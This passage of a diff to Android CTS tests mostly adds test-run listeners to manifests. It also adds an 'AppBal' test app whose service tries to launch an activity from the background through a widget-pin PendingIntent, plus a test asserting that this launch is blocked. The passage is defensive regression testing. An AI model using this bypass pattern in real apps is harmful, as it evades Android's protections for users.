-public class PocActivity extends Activity {
+/**
+ * Test of {@link OnDevicePersonalizationManager}
+ */
+@RunWith(JUnit4.class)
+public class OnDevicePersonalizationServiceTest {
+    @Test
+    public void test() throws Exception {}
 }
diff --git a/tests/pdf/AndroidManifest.xml b/tests/pdf/AndroidManifest.xml
index 6010dbc..2d65f1c 100644
--- a/tests/pdf/AndroidManifest.xml
+++ b/tests/pdf/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.graphics.pdf.cts"
                      android:label="CTS tests of android.graphics.pdf">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/providerui/AndroidManifest.xml b/tests/providerui/AndroidManifest.xml
index 711ab0e..a14df70 100644
--- a/tests/providerui/AndroidManifest.xml
+++ b/tests/providerui/AndroidManifest.xml
@@ -56,6 +56,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.providerui.cts"
                      android:label="CTS UI tests of android.provider">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/sensor/AndroidManifest.xml b/tests/sensor/AndroidManifest.xml
index 1cce32d..e693c87 100644
--- a/tests/sensor/AndroidManifest.xml
+++ b/tests/sensor/AndroidManifest.xml
@@ -34,6 +34,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.hardware.sensor.cts"
                      android:label="CTS sensor tests">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/accounts/AndroidManifest.xml b/tests/tests/accounts/AndroidManifest.xml
index acf78ad..999a3c6 100644
--- a/tests/tests/accounts/AndroidManifest.xml
+++ b/tests/tests/accounts/AndroidManifest.xml
@@ -69,6 +69,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.accounts.cts"
          android:label="CTS tests for android.accounts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/activityrecognition/AndroidManifest.xml b/tests/tests/activityrecognition/AndroidManifest.xml
index c251d6c..5fb7c8f 100644
--- a/tests/tests/activityrecognition/AndroidManifest.xml
+++ b/tests/tests/activityrecognition/AndroidManifest.xml
@@ -39,6 +39,9 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.activityrecognition.cts"
         android:label="CTS activity recognition tests">
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/animation/AndroidManifest.xml b/tests/tests/animation/AndroidManifest.xml
index 73f264f..6e8704e 100644
--- a/tests/tests/animation/AndroidManifest.xml
+++ b/tests/tests/animation/AndroidManifest.xml
@@ -31,6 +31,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.animation.cts"
                      android:label="CTS tests for android.animation package">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/app.usage/AndroidManifest.xml b/tests/tests/app.usage/AndroidManifest.xml
index bc64736..3744b05 100644
--- a/tests/tests/app.usage/AndroidManifest.xml
+++ b/tests/tests/app.usage/AndroidManifest.xml
@@ -79,6 +79,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.usage.cts"
                      android:label="CTS tests of android.app.usage">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/app/AndroidManifest.xml b/tests/tests/app/AndroidManifest.xml
index f888da4..e46d311 100644
--- a/tests/tests/app/AndroidManifest.xml
+++ b/tests/tests/app/AndroidManifest.xml
@@ -43,6 +43,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.cts"
                      android:label="CTS tests of android.app">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/appcomponentfactory/AndroidManifest.xml b/tests/tests/appcomponentfactory/AndroidManifest.xml
index e6f3c99..d943327 100644
--- a/tests/tests/appcomponentfactory/AndroidManifest.xml
+++ b/tests/tests/appcomponentfactory/AndroidManifest.xml
@@ -34,6 +34,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.componentfactory.cts"
                      android:label="CTS tests of android.app">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/appenumeration/AndroidManifest.xml b/tests/tests/appenumeration/AndroidManifest.xml
index 3a631e3..8e9d618 100644
--- a/tests/tests/appenumeration/AndroidManifest.xml
+++ b/tests/tests/appenumeration/AndroidManifest.xml
@@ -51,6 +51,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.appenumeration.cts"
                      android:label="CTS tests for app enumeration">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
index 4db7ea0..97610fa 100644
--- a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
+++ b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
@@ -969,7 +969,7 @@
     fun checkAttributionsAreUserVisible() {
         val pi = context.packageManager.getPackageInfo(
                 TEST_SERVICE_PKG, PackageManager.PackageInfoFlags.of(GET_ATTRIBUTIONS_LONG))
-        assertThat(pi.applicationInfo.areAttributionsUserVisible())
+        assertThat(pi.applicationInfo?.areAttributionsUserVisible()).isTrue()
     }
 
     @After
diff --git a/tests/tests/appwidget/Android.bp b/tests/tests/appwidget/Android.bp
index 9fc1a0d..89b1e10 100644
--- a/tests/tests/appwidget/Android.bp
+++ b/tests/tests/appwidget/Android.bp
@@ -37,6 +37,7 @@
         "ctstestrunner-axt",
         "junit",
         "compatibility-device-util-axt",
+        "cts-wm-util",
     ],
     libs: ["android.test.base"],
     // Tag this module as a cts test artifact
@@ -51,6 +52,7 @@
         ":CtsAppWidgetProvider1",
         ":CtsAppWidgetLauncher1",
         ":CtsAppWidgetProvider2",
+        ":CtsAppWidgetTestCasesBalApp",
     ],
     per_testcase_directory: true,
 }
diff --git a/tests/tests/appwidget/AndroidManifest.xml b/tests/tests/appwidget/AndroidManifest.xml
index e4c683f..5d8b055 100644
--- a/tests/tests/appwidget/AndroidManifest.xml
+++ b/tests/tests/appwidget/AndroidManifest.xml
@@ -22,6 +22,7 @@
     <queries>
         <!-- UpdateProviderInfoTest queries widget providers. -->
         <package android:name="android.appwidget.cts.widgetprovider"/>
+        <package android:name="android.appwidget.cts.appbal" />
     </queries>
 
   <application>
@@ -101,6 +102,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
        android:targetPackage="android.appwidget.cts"
        android:label="Tests for the app widget APIs.">
+      <meta-data android:name="listener"
+           android:value="com.android.cts.runner.CtsTestRunListener"/>
   </instrumentation>
 
 </manifest>
diff --git a/tests/tests/appwidget/AndroidTest.xml b/tests/tests/appwidget/AndroidTest.xml
index db4aa66..96c6a1e 100644
--- a/tests/tests/appwidget/AndroidTest.xml
+++ b/tests/tests/appwidget/AndroidTest.xml
@@ -26,8 +26,8 @@
         <option name="test-file-name" value="CtsAppWidgetLauncher2.apk" />
         <option name="test-file-name" value="CtsAppWidgetLauncher3.apk" />
         <option name="test-file-name" value="CtsAppWidgetTestCases.apk" />
+        <option name="test-file-name" value="CtsAppWidgetTestCasesBalApp.apk" />
     </target_preparer>
-
     <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
         <option name="run-command" value="mkdir -p /data/local/tmp/cts/widgetprovider/" />
         <option name="teardown-command" value="rm -rf /data/local/tmp/cts/widgetprovider"/>
diff --git a/tests/tests/appwidget/AppBal/Android.bp b/tests/tests/appwidget/AppBal/Android.bp
new file mode 100644
index 0000000..5c4b273
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/Android.bp
@@ -0,0 +1,41 @@
+// Copyright (C) 2014 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//      http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+    name: "CtsAppWidgetTestCasesBalApp",
+    defaults: ["cts_defaults"],
+    srcs: [
+        "src/**/*.java",
+    ],
+
+    target_sdk_version: "32",
+
+    static_libs: [
+        "mockito-target-minus-junit4",
+        "ctstestrunner-axt",
+        "junit",
+        "compatibility-device-util-axt",
+        "cts-wm-util",
+    ],
+    libs: ["android.test.base"],
+    // Tag this module as a cts test artifact
+    test_suites: [
+        "cts",
+        "general-tests",
+    ],
+}
diff --git a/tests/tests/appwidget/AppBal/AndroidManifest.xml b/tests/tests/appwidget/AppBal/AndroidManifest.xml
new file mode 100755
index 0000000..e0c4ed1
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/AndroidManifest.xml
@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  ~ Copyright (C) 2019 The Android Open Source Project
+  ~
+  ~ Licensed under the Apache License, Version 2.0 (the "License");
+  ~ you may not use this file except in compliance with the License.
+  ~ You may obtain a copy of the License at
+  ~
+  ~      http://www.apache.org/licenses/LICENSE-2.0
+  ~
+  ~ Unless required by applicable law or agreed to in writing, software
+  ~ distributed under the License is distributed on an "AS IS" BASIS,
+  ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  ~ See the License for the specific language governing permissions and
+  ~ limitations under the License
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+          package="android.appwidget.cts.appbal">
+    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
+
+    <queries>
+        <!-- UpdateProviderInfoTest queries widget providers. -->
+        <package android:name="android.appwidget.cts.widgetprovider"/>
+        <package android:name="android.appwidget.cts" />
+    </queries>
+    <application>
+        <activity
+            android:name="android.appwidget.cts.appbal.BalActivity"
+            android:label="BalActivity"
+            android:visibleToInstantApps="true"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN"/>
+                <category android:name="android.intent.category.DEFAULT" />
+            </intent-filter>
+        </activity>
+
+        <activity
+            android:name="android.appwidget.cts.appbal.EmptyActivity"
+            android:exported="true" />
+
+        <service
+            android:name="android.appwidget.cts.appbal.BalService"
+            android:exported="true" />
+
+        <receiver android:name="android.appwidget.cts.appbal.BalAppWidgetProvider"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
+            </intent-filter>
+            <meta-data android:name="android.appwidget.provider"
+                android:resource="@xml/widget_info" />
+        </receiver>
+    </application>
+</manifest>
diff --git a/tests/tests/appwidget/AppBal/res/xml/widget_info.xml b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
new file mode 100644
index 0000000..b0e66ed
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/res/xml/widget_info.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+<appwidget-provider
+    xmlns:android="http://schemas.android.com/apk/res/android"
+    android:minWidth="180dp"
+    android:minHeight="110dp"
+    android:updatePeriodMillis="86400000"
+    android:resizeMode="horizontal|vertical"
+    android:widgetCategory="home_screen">
+</appwidget-provider>
\ No newline at end of file
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
new file mode 100644
index 0000000..353b751
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalActivity.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.appwidget.cts.appbal;
+
+import android.app.Activity;
+import android.app.PendingIntent;
+import android.appwidget.AppWidgetManager;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class BalActivity extends Activity {
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+    }
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+        requestAppWidget();
+    }
+
+    private void requestAppWidget() {
+        try {
+            // pinResult tries to launch a service which launches a background activity.
+            PendingIntent pinResult = PendingIntent.getService(this, 0,
+                    new Intent(this, BalService.class),
+                    PendingIntent.FLAG_ONE_SHOT | PendingIntent.FLAG_MUTABLE);
+            AppWidgetManager appWidgetManager = this.getSystemService(AppWidgetManager.class);
+            android.content.ComponentName firstWidgetProvider =
+                    new android.content.ComponentName(this, BalAppWidgetProvider.class);
+            appWidgetManager.requestPinAppWidget(firstWidgetProvider, null, pinResult);
+            Log.i("BalActivity", "requested pin App widget");
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
similarity index 73%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
index 4416990..97eab2d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalAppWidgetProvider.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -13,10 +13,9 @@
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */
+package android.appwidget.cts.appbal;
 
-package android.security.cts.CVE_2022_20143;
+import android.appwidget.AppWidgetProvider;
 
-import android.app.Activity;
-
-public class PocActivity extends Activity {
+public class BalAppWidgetProvider extends AppWidgetProvider {
 }
diff --git a/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
new file mode 100644
index 0000000..c529681
--- /dev/null
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/BalService.java
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.appwidget.cts.appbal;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.IBinder;
+import android.util.Log;
+
+public class BalService extends Service {
+
+    Handler mHandler;
+
+    public BalService() {
+    }
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return null;
+    }
+
+    @Override
+    public void onCreate() {
+        Log.i("BalService", "Service started");
+        mHandler = new Handler();
+        mHandler.postDelayed(this::startBackgroundActivity, 1000 * 30);
+        super.onCreate();
+    }
+
+    void startBackgroundActivity() {
+        try {
+            Log.e("BalService", "Start background activity called");
+            Intent intent = new Intent(this, EmptyActivity.class);
+            intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+            this.startActivity(intent);
+
+        } catch (Exception e) {
+            Log.e("BalService", "startBackgroundActivity throws exception." + e);
+        }
+    }
+
+    @Override
+    public void onDestroy() {
+        Log.i("BalService", "Service destroyed!");
+        super.onDestroy();
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
index 4416990..5b57d2c 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/appwidget/AppBal/src/android.appwidget.cts.appbal/EmptyActivity.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -13,10 +13,8 @@
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */
-
-package android.security.cts.CVE_2022_20143;
+package android.appwidget.cts.appbal;
 
 import android.app.Activity;
 
-public class PocActivity extends Activity {
-}
+public class EmptyActivity extends Activity { }
diff --git a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
index 7fc7211..a8ac2ee 100644
--- a/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
+++ b/tests/tests/appwidget/packages/src/android/appwidget/cts/packages/AppWidgetConfirmPin.java
@@ -30,10 +30,10 @@
     private PinItemRequest mRequest;
 
     private BroadcastReceiver mReceiver;
+
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
-
         try {
             final LauncherApps launcherApps = getSystemService(LauncherApps.class);
             mRequest = launcherApps.getPinItemRequest(getIntent());
diff --git a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
index 4e68779..6e9d788 100644
--- a/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
+++ b/tests/tests/appwidget/src/android/appwidget/cts/RequestPinAppWidgetTest.java
@@ -16,20 +16,30 @@
 
 package android.appwidget.cts;
 
+import static android.content.Intent.FLAG_ACTIVITY_NEW_TASK;
+import static android.server.wm.UiDeviceUtils.pressHomeButton;
+
 import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertNotNull;
 import static org.junit.Assert.assertTrue;
 
+import android.app.ActivityManager;
 import android.app.PendingIntent;
 import android.appwidget.AppWidgetManager;
+import android.appwidget.cts.activity.EmptyActivity;
 import android.appwidget.cts.common.Constants;
+import android.content.ComponentName;
 import android.content.Context;
 import android.content.Intent;
 import android.content.pm.LauncherApps;
 import android.os.Bundle;
 import android.platform.test.annotations.AppModeFull;
+import android.server.wm.WindowManagerStateHelper;
+import android.util.Log;
 
 import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.SystemUtil;
 
 import org.junit.After;
 import org.junit.Before;
@@ -46,6 +56,8 @@
 
     private String mDefaultLauncher;
 
+    protected WindowManagerStateHelper mWmState = new WindowManagerStateHelper();
+
     @Before
     public void setUpLauncher() throws Exception {
         mDefaultLauncher = getDefaultLauncher();
@@ -57,7 +69,7 @@
         setLauncher(mDefaultLauncher);
     }
 
-    @CddTest(requirement="3.8.2/C-2-2")
+    @CddTest(requirement = "3.8.2/C-2-2")
     private void runPinWidgetTest(final String launcherPkg) throws Exception {
         setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
 
@@ -103,7 +115,7 @@
         assertEquals("dummy-2", resultReceiver.result.getStringExtra("dummy"));
     }
 
-    @Ignore("b/265187199")
+    //@Ignore("b/265187199")
     @Test
     public void testPinWidget_launcher1() throws Exception {
         runPinWidgetTest("android.appwidget.cts.packages.launcher1");
@@ -115,9 +127,9 @@
         runPinWidgetTest("android.appwidget.cts.packages.launcher2");
     }
 
-    @CddTest(requirement="3.8.2/C-2-1")
+    @CddTest(requirement = "3.8.2/C-2-1")
     public void verifyIsRequestPinAppWidgetSupported(String launcherPkg, boolean expectedSupport)
-        throws Exception {
+            throws Exception {
         setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
 
         Context context = getInstrumentation().getContext();
@@ -155,7 +167,52 @@
     }
 
     private void setLauncher(String component) throws Exception {
-        runShellCommand("cmd package set-home-activity --user "
+        Log.i("BalActivity", "cmd package set-home-activity --user "
                 + getInstrumentation().getContext().getUserId() + " " + component);
+        /*runShellCommand("cmd package set-home-activity --user "
+                + getInstrumentation().getContext().getUserId() + " " + component);*/
+        runShellCommand("cmd package set-home-activity "
+                 + component);
     }
+
+    @Test
+    public void testRequestPinAppWidgetNotAllBal() throws Exception {
+        String launcherPkg = "android.appwidget.cts.packages.launcher1";
+        setLauncher(launcherPkg + "/" + LAUNCHER_CLASS);
+        Context context = getInstrumentation().getContext();
+        // Request to pin widget
+        BlockingBroadcastReceiver setupReceiver = new BlockingBroadcastReceiver()
+                .register(Constants.ACTION_SETUP_REPLY);
+
+        // starts the BalActivity in the test app AppBal.
+        context.startActivity(new Intent(Intent.ACTION_MAIN)
+                .setPackage("android.appwidget.cts.appbal")
+                .addFlags(FLAG_ACTIVITY_NEW_TASK));
+
+        setupReceiver.await();
+        // Verify that the confirmation dialog was opened
+        assertTrue(setupReceiver.result.getBooleanExtra(Constants.EXTRA_SUCCESS, false));
+
+        // Accept the request
+        context.sendBroadcast(new Intent(Constants.ACTION_CONFIRM_PIN)
+                .setPackage(launcherPkg));
+
+        // Press home key to ensure stopAppSwitches is called because the last-stop-app-switch-time
+        // is a criteria of allowing background start.
+        pressHomeButton();
+        SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+        mWmState.waitForHomeActivityVisible();
+        SystemUtil.runWithShellPermissionIdentity(ActivityManager::resumeAppSwitches);
+
+        boolean result = false;
+        // The background activity will be launched 30s after the BalService starts. The
+        // waitForFocusedActivity only waits for 5s. So put it in a for loop.
+        for (int i = 0; i < 10; i++) {
+            result = mWmState.waitForFocusedActivity(
+                    "Empty Activity is launched", new ComponentName(context, EmptyActivity.class));
+            if (result) break;
+        }
+        assertFalse("Should not able to launch background activity", result);
+    }
+
 }
diff --git a/tests/tests/assist/AndroidManifest.xml b/tests/tests/assist/AndroidManifest.xml
index 1847832..2d68e1a 100644
--- a/tests/tests/assist/AndroidManifest.xml
+++ b/tests/tests/assist/AndroidManifest.xml
@@ -49,5 +49,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.assist.cts"
          android:label="CTS tests of android.assist">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/attributionsource/AndroidManifest.xml b/tests/tests/attributionsource/AndroidManifest.xml
index f2599b6..52ccf7d 100644
--- a/tests/tests/attributionsource/AndroidManifest.xml
+++ b/tests/tests/attributionsource/AndroidManifest.xml
@@ -43,6 +43,9 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.attributionsource.cts"
         android:label="CTS permission attribution tests">
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
index adcfeb4..68e7025 100644
--- a/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
+++ b/tests/tests/attributionsource/BlamedPermissionApp2/AndroidManifest.xml
@@ -47,6 +47,9 @@
         android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.attributionsource.cts.blamed2"
         android:label="CTS permission attribution tests">
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/background/AndroidManifest.xml b/tests/tests/background/AndroidManifest.xml
index 1fdda71..f42da76 100755
--- a/tests/tests/background/AndroidManifest.xml
+++ b/tests/tests/background/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.app.cts.backgroundrestrictions"
         android:label="CTS tests for background restrictions">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/batteryhealth/AndroidManifest.xml b/tests/tests/batteryhealth/AndroidManifest.xml
index ce213df..5aee337 100755
--- a/tests/tests/batteryhealth/AndroidManifest.xml
+++ b/tests/tests/batteryhealth/AndroidManifest.xml
@@ -23,6 +23,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.os.cts.batteryhealth"
         android:label="CTS tests for battery health features">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/batterysaving/AndroidManifest.xml b/tests/tests/batterysaving/AndroidManifest.xml
index b5c1f70..c28fd40 100755
--- a/tests/tests/batterysaving/AndroidManifest.xml
+++ b/tests/tests/batterysaving/AndroidManifest.xml
@@ -30,6 +30,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.os.cts.batterysaving"
         android:label="CTS tests for battery saving features">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/bluetooth/AndroidManifest.xml b/tests/tests/bluetooth/AndroidManifest.xml
index c72a503..a151200 100644
--- a/tests/tests/bluetooth/AndroidManifest.xml
+++ b/tests/tests/bluetooth/AndroidManifest.xml
@@ -38,6 +38,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.bluetooth.cts"
                      android:label="CTS tests of bluetooth component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/calendarcommon/AndroidManifest.xml b/tests/tests/calendarcommon/AndroidManifest.xml
index 0bbf132..ad94354 100644
--- a/tests/tests/calendarcommon/AndroidManifest.xml
+++ b/tests/tests/calendarcommon/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.calendarcommon2.cts"
                      android:label="CTS tests of calendarcommon">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
     <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="17"></uses-sdk>
diff --git a/tests/tests/calendarprovider/AndroidManifest.xml b/tests/tests/calendarprovider/AndroidManifest.xml
index c5d2b11..62562ff 100644
--- a/tests/tests/calendarprovider/AndroidManifest.xml
+++ b/tests/tests/calendarprovider/AndroidManifest.xml
@@ -29,6 +29,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.provider.cts.calendar">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/car/AndroidManifest.xml b/tests/tests/car/AndroidManifest.xml
index fdeb18c..0dfa316 100644
--- a/tests/tests/car/AndroidManifest.xml
+++ b/tests/tests/car/AndroidManifest.xml
@@ -83,5 +83,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.car.cts"
                      android:label="CTS tests for Automotive">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/car_builtin/AndroidManifest.xml b/tests/tests/car_builtin/AndroidManifest.xml
index 9b19ba4..763b9b5 100644
--- a/tests/tests/car_builtin/AndroidManifest.xml
+++ b/tests/tests/car_builtin/AndroidManifest.xml
@@ -59,6 +59,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.car.cts.builtin"
